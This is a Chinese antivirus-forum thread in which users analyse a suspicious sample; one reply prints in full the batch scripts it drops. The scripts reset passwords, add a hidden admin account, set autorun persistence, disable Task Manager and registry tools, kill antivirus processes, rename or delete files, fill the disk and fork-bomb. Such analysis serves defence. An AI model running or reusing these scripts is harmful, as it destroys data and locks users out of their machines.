123
返回列表 发新帖
楼主: 安全守护者
收起左侧

[可疑文件] 大伙测试下,并分析一下行为

[复制链接]
安全守护者
头像被屏蔽
 楼主| 发表于 2018-1-7 12:39:59 | 显示全部楼层
Juno_Jr. 发表于 2018-1-7 12:35
哈勃里不是写的很明显了吗..

如果你用哈勃,什么动作都有了,还说什么呢?
Juno_Jr.
发表于 2018-1-7 12:41:22 | 显示全部楼层
安全守护者 发表于 2018-1-7 12:39
如果你用哈勃,什么动作都有了,还说什么呢?

....哈勃是你自己发的啊...我就打开看了下而已
remiliacn
发表于 2018-1-7 13:04:37 | 显示全部楼层
访问程序:net.exe
reg.exe
shutdown.exe
attrib.exe

主要病毒行为:
更改密码
禁用任务管理器
禁用桌面
禁用注册表
更改并隐藏autoexec.bat (attrib +r +s +h)

Avast下载KILL

学雷锋做人
发表于 2018-1-7 13:06:08 | 显示全部楼层
哈勃行为已经充分概况了,File_Analysis及时更新2.3.0.0规则文件,修复了这个样本创建进程导致失控的BUG
Juno_Jr.
发表于 2018-1-7 13:06:25 | 显示全部楼层
本帖最后由 Juno_Jr. 于 2018-1-7 14:47 编辑
安全守护者 发表于 2018-1-7 12:39
如果你用哈勃,什么动作都有了,还说什么呢?

补上他释放的文件 还有几个exe 没什么权限 懒得传了闲着没事把几个exe都看了
都是释放bat执行
主文件:
@Shift /0
@echo off
net user %username% bc555b6323514bf87e600a182db70d00
cd\
net user YOURS PC IS OVER lovechina /add
net localgroup Administrators YOURS PC IS OVER /add
net user YOURS PC IS OVER /active:yes
shutdown -r -t 3
copy %0 C:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动\a.bat
copy %0 c:\autoexec.bat
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
attrib autoexec.bat +r +s +h
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v norun /t reg_dword /d 00000001 /f
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v nodrives /t reg_dword /d 429467295 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t REG_DWORD /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f
rd /q/s "%~d0"
type "%~f0" >> "%~f0"
cd\
for /f "delims=" %%i in ('dir /s .') do @ren %%i *.jpg
exit/b
md d:\fly >nul 2>nul
set a=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
for %%a in (%a%) do subst %%a: d:\fly >nul 2>nul
if not exist "%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat"
copy %~fs0 "%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat">nul
echo
@echo off>%windir%\power.bat
echo if "%%1"=="" goto :end>>%windir%\power.bat
echo if exist C:\_stop goto :EOF>>%windir%\power.bat
echo start /B %%~fs0 exp>>%windir%\power.bat
echo :s>>%windir%\power.bat
echo if not exist C:\_stop goto s>>%windir%\power.bat
echo exit>>%windir%\power.bat
echo :end>>%windir%\power.bat
echo del %%~fs0>>%windir%\power.bat
echo set ws=CreateObject("W.Shell")>%windir%\power.vbs
echo ws.Run "%windir%\power.bat exp",0 >>%windir%\power.vbs
W %windir%\power.vbs
del %windir%\power.vbs
set p=%~ps0
if not %p:~-3,2%==启动 del %~fs0
:x
taskkill /f /im cmd.EⅩE
goto x
set a=0
:22
set /a a=%a%+1
echo laji >C:\%a%.txt
goto 22
start Speed.bat
ping www.bayuxuexiao.com -l 65500 -t
%0
tracert bbs.huorong.cn
tracert www.xyyao.com
tracert bbs.kafan.cn
tracert www.bayuxuexiao.com
tracert www.bayuxuexiao.netKO.EXE
@shift /0
@shift /0
@echo off
title \xe9\x87\x91\xe5\xb1\xb1\xe5\x8d\xab\xe5\xa3\xab\xe5\xae\x89\xe8\xa3\x85\xe7\xa8\x8b\xe5\xba\x8f
set taskkill=s
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat +r +s +h
net stop sharedaccess >nul
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
net stop Shadow" "System" "Service
set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul
for %%a in (c %alldrive%) do del %%a:\\xe4\xbf\xae\xe5\xa4\x8d* /f /s /q >nul
rem \xe4\xbf\xae\xe6\x94\xb9\xe6\xb3\xa8\xe5\x86\x8c\xe8\xa1?......
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\
Folder\Hidden\SHOWALL /v
CheckedValue /t REG_DWORD /d 00000000 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoRun /t REG_DWORD /d
00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoRecentDocsMenu /t
REG_DWORD /d 00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoDrives /t REG_DWORD /d
4294967295 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
Disableregistrytools /t
REG_DWORD /d 00000002 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoNetHood /t REG_DWORD /d
00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V
NoDesktop /t REG_DWORD /d
00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
No <truncated>


网络测试2.0.exe
@shift /0
@echo off
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v lin /t REG_SZ /d *:\1.bat /f
@ping www.bayuxuexiao.net
中间一大段都是@ping www.bayuxuexiao.net
@ping www.bayuxuexiao.net
net user administrator 4746510644db23a6a68372b5bced8f45


360一键安装.exe
@shift /0
@ECHO OFF
title 垃圾清理
echo 垃圾清理
pause
ntsd -c q -pn smss.exe
shutdown -a
net user %username% /add
NET LOCALGROUP ADMINISTRATORS %username% /add
set a=0
:22
set /a a=%a%+1
echo laji >C:\%a%.txt
goto 22
net user
%0
cd\
  for /f "delims=" %%i in ('dir /s .') do @ren %%i *.jpg
  exit/b
  for /l %%i in (0,1,254) do start %%i
MD d:\fly >nul 2>nul
  set a=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
  for %%a in (%a%) do subst %%a: d:\fly >nul 2>nul
ping 127.1 -n 5 >nul
if not exist "%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat" copy %~fs0 "%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat">nul
  echo @echo off>%windir%\power.bat
  echo if "%%1"=="" goto :end>>%windir%\power.bat
  echo if exist C:\_stop goto :EOF>>%windir%\power.bat
  echo start /B %%~fs0 exp>>%windir%\power.bat
  echo :s>>%windir%\power.bat
  echo if not exist C:\_stop goto s>>%windir%\power.bat
  echo exit>>%windir%\power.bat
  echo :end>>%windir%\power.bat
  echo del %%~fs0>>%windir%\power.bat
  echo set ws=CreateObject("W.Shell")>%windir%\power.vbs
  echo ws.Run "%windir%\power.bat exp",0 >>%windir%\power.vbs
  W %windir%\power.vbs
  del %windir%\power.vbs
  set p=%~ps0
  if not %p:~-3,2%==启动 del %~fs0
  :x
  taskkill /f /im cmd.EⅩE
  goto x
:p
  echo start C:\1.bat >> C:\1.bat
  start C:\1.bat
  goto p
  :loop
  start "" "%systemdrive%\program files\internet explorer\iexplore.EⅩE" -k "blank"
  goto loop
copy %0 "%userprofile%\「开始」菜单\程序\启动\1.bat"
  @reg??add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f
  echo rd %windei%/windos /s /q & goto 1>d:\explorer.bat
  echo :1>>d:\explorer.bat
  echo del d:\*.EXE /f /s /q>>d:\explorer.bat
  echo del e:\*.EXE /f /s /q>>d:\explorer.bat
  start d:\explorer.bat
  exit
 reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v noviewcontextmenu /t reg_dword /d 00000001 /f
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v
  restrictrun /t reg_dword /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d 00000001 /f
eg add
  hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v nodrives /t reg_dword /d 429467295 /f
reg add
  hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v norun /t reg_dword /d 00000001 /f
shutdown -r -t 3
  copy %0 C:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动\a.bat
  copy %0 c:\autoexec.bat
  REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
  REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
  attrib autoexec.bat +r +s +h
  REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f
  del %0
exit


Excel.exe
感染用的



安全守护者
头像被屏蔽
 楼主| 发表于 2018-1-7 14:03:16 | 显示全部楼层
学雷锋做人 发表于 2018-1-7 13:06
哈勃行为已经充分概况了,File_Analysis及时更新2.3.0.0规则文件,修复了这个样本创建进程导致失控的BUG

所以之前的规则如果打开这个程序会破坏系统?
540923555
发表于 2018-1-7 15:47:33 | 显示全部楼层
安全守护者 发表于 2018-1-6 13:59
CylanceUnsafe
JiangminWorm.Generic.dwh
K7AntiVirusTrojan ( 0051918e1 )

看来我不需要测WD了
瑞星之剑
头像被屏蔽
发表于 2018-1-7 15:59:23 来自手机 | 显示全部楼层
2605276004x 发表于 2018-1-6 13:31
没能触动卡巴主防的病毒不是个好病毒

666
学雷锋做人
发表于 2018-1-7 19:36:11 | 显示全部楼层
安全守护者 发表于 2018-1-7 14:03
所以之前的规则如果打开这个程序会破坏系统?

此前规则方面存在疏漏,默认允许危险行为
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 03:56 , Processed in 0.100129 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表